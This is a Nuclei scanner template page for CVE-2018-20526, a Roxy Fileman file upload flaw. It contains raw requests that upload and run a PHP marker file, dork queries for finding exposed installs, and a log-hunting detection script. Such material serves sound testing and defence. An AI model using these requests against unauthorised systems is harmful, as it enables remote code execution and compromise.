Roxy Fileman 1.4.5 - Unrestricted File Upload
ID: CVE-2018-20526
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman
Description
Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
YAML Source
id: CVE-2018-20526

info:
  name: Roxy Fileman 1.4.5 - Unrestricted File Upload
  author: DhiyaneshDK
  severity: critical
  description: |
    Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system.
  remediation: |
    Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads.
  reference:
    - http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html
    - https://www.exploit-db.com/exploits/46085/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-20526
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-20526
    cwe-id: CWE-434
    epss-score: 0.00666
    epss-percentile: 0.79658
    cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: roxyfileman
    product: roxy_fileman
    shodan-query: http.title:"roxy file manager"
    fofa-query: title="roxy file manager"
    google-query:
      - intitle:"Roxy file manager"
      - intitle:"roxy file manager"
  tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman

http:
  - raw:
      - |
        POST /php/upload.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

        ------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="action"

        upload
        ------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="method"

        ajax
        ------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="d"

        /Uploads
        ------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php7"
        Content-Type: application/octet-stream

        <?php echo md5('CVE-2018-20526'); ?>

        ------WebKitFormBoundary20kgW2hEKYaeF5iP--
      - |
        GET /Uploads/{{randstr}}.php7 HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "f76d6a5f7491700cc3a678bdba2902d3"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bb93da42368701a83c238863b0732396792fa2bf722f4b329121c3a9999f789e02205a507bfcbb00ea56cf4610da829aead05232f9ce7fa353dcc7ff3974e47aba22:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-20526.yaml"
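
The request pair the template sends (a POST to /php/upload.php, then a GET of a script-type file under /Uploads answered with 200) can also be hunted for in existing web server access logs. The following is an added example, not part of the template or of Roxy Fileman; it assumes combined log format, the extension list is an assumption, and the sample log lines are constructed.

```python
import re

# Combined log format is assumed: client, [time], "METHOD path proto", status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Extensions often mapped to the PHP handler (assumed list; align it with your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.IGNORECASE)
UPLOAD_ENDPOINT = "/php/upload.php"  # endpoint the template POSTs to
UPLOAD_DIR = "/uploads/"             # directory from the template's "d" field, lowercased

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2019:10:00:01 +0000] "POST /php/upload.php HTTP/1.1" 200 52 "-" "-"',
    '203.0.113.7 - - [10/Jan/2019:10:00:02 +0000] "GET /Uploads/a1b2c3.php7 HTTP/1.1" 200 32 "-" "-"',
    '198.51.100.4 - - [10/Jan/2019:10:05:00 +0000] "POST /php/upload.php HTTP/1.1" 200 52 "-" "-"',
    '198.51.100.4 - - [10/Jan/2019:10:05:03 +0000] "GET /Uploads/photo.jpg HTTP/1.1" 200 48211 "-" "-"',
    '192.0.2.9 - - [10/Jan/2019:11:00:00 +0000] "GET /Uploads/old.phtml HTTP/1.1" 200 10 "-" "-"',
    '192.0.2.9 - - [10/Jan/2019:11:00:05 +0000] "GET /Uploads/gone.php HTTP/1.1" 404 10 "-" "-"',
]


def find_script_hits(lines):
    """Return (client, path, saw_upload_post) for every 200 GET of a
    script-type file under the upload directory."""
    posted = set()  # clients already seen POSTing to the upload endpoint
    hits = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, method, url, status = m.groups()
        path = url.split("?", 1)[0]  # ignore any query string
        if method == "POST" and path.lower().endswith(UPLOAD_ENDPOINT):
            posted.add(client)
        elif (method == "GET" and status == "200"
              and UPLOAD_DIR in path.lower() and SCRIPT_EXT.search(path)):
            # Script served from the upload directory; an earlier upload POST
            # from the same client raises confidence.
            hits.append((client, path, client in posted))
    return hits


if __name__ == "__main__":
    for client, path, correlated in find_script_hits(SAMPLE_LOG):
        level = "HIGH" if correlated else "REVIEW"
        print(f"{level}: {client} fetched {path}")
```

Uncorrelated hits are still worth reviewing, since the upload and the fetch can come from different client addresses.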